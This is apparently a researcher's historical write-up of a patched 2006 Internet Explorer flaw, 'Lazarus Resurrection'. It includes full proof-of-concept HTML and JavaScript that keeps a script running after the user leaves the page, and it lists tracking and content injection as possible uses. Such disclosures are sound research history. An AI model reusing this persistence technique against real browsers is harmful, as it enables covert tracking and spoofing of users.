I named this one “Lazarus Resurrection” because the script dies and comes back to life. The idea was to keep a piece of JavaScript running even after the user has navigated away from the page — the kind of thing that should not be possible, but turned out to be surprisingly straightforward in IE at the time.
How It Works
The technique uses a hidden IFRAME and a cookie to bootstrap itself across a page reload, then hooks into window.onunload to inject a persistent script before the page is torn down.
Here is the sequence:
- On first visit, the page creates a hidden IFRAME named
LAZARUSand immediately setswindow.opener = LAZARUS. This hijacks theopenerreference to point to the local IFRAME’s document instead of whatever actually opened the window. - The page reloads itself (
location.reload()), which clears the DOM — including the IFRAME — but the reference stored inwindow.openeris cached and survives. - On the second load (detected by cookie), the page registers an
onunloadhandler. - When the user eventually navigates away,
onunloadfires and writes asetIntervalscript intowindow.opener.document— the preserved, “dead” IFRAME document. - That script keeps firing every five seconds regardless of where the user goes next, until they close the tab.
The alert in the demo is just a proof of concept. With a resident script you can track URL changes, inject content into other pages, or throw popups that appear to come from whatever site the user is currently visiting.
The Code
<HTML>
<HEAD><TITLE>Lazarus Resurrection</TITLE></HEAD>
<BODY>
<FONT FACE="Tahoma" SIZE="2">
You will see an alert every five seconds as soon as you leave this page.<BR><BR>
The steps:<BR><BR>
1) Create an IFRAME.<BR>
2) Save a pointer to it in window.opener.<BR>
3) Reload the page to "kill" the IFRAME.<BR>
4) On unload, write a script to window.opener (the saved pointer).<BR>
5) That script survives and keeps running.<BR><BR>
Navigate away and wait five seconds...
</FONT>
<IFRAME NAME="LAZARUS" STYLE="display:none;"></IFRAME>
<SCRIPT LANGUAGE="JavaScript">
if (document.cookie.indexOf('LAZARUS_IS_ALIVE') == -1)
{
// First visit: save the IFRAME reference in window.opener, then reload.
document.cookie = 'LAZARUS_IS_ALIVE=OK;';
window.opener = LAZARUS;
location.reload();
}
else
{
// Second visit: register the unload handler that injects the resident script.
window.onunload = function() {
var scriptCode = "setInterval('alert(\"Still here — even after you left the page.\")', 5000);";
window.opener.document.write('<SCRIPT>' + scriptCode + '<\/SCRIPT>');
window.opener.document.close();
}
}
</SCRIPT>
</BODY>
</HTML>The reason this worked is that IE cached the reference to the IFRAME’s document in window.opener before the reload destroyed the IFRAME itself. After the reload, the IFRAME was gone from the DOM, but the reference was still alive in memory. Writing to it via document.write created a new scripting context that had no parent page to be destroyed along with — it just kept running.
MSRC tracked this as case 6427. The popup persistence aspect was patched; the broader class of resident script techniques took longer to fully close off.
Reported to MSRC in 2006. This was one was patched long ago — Shared here as a historical record for learning purposes.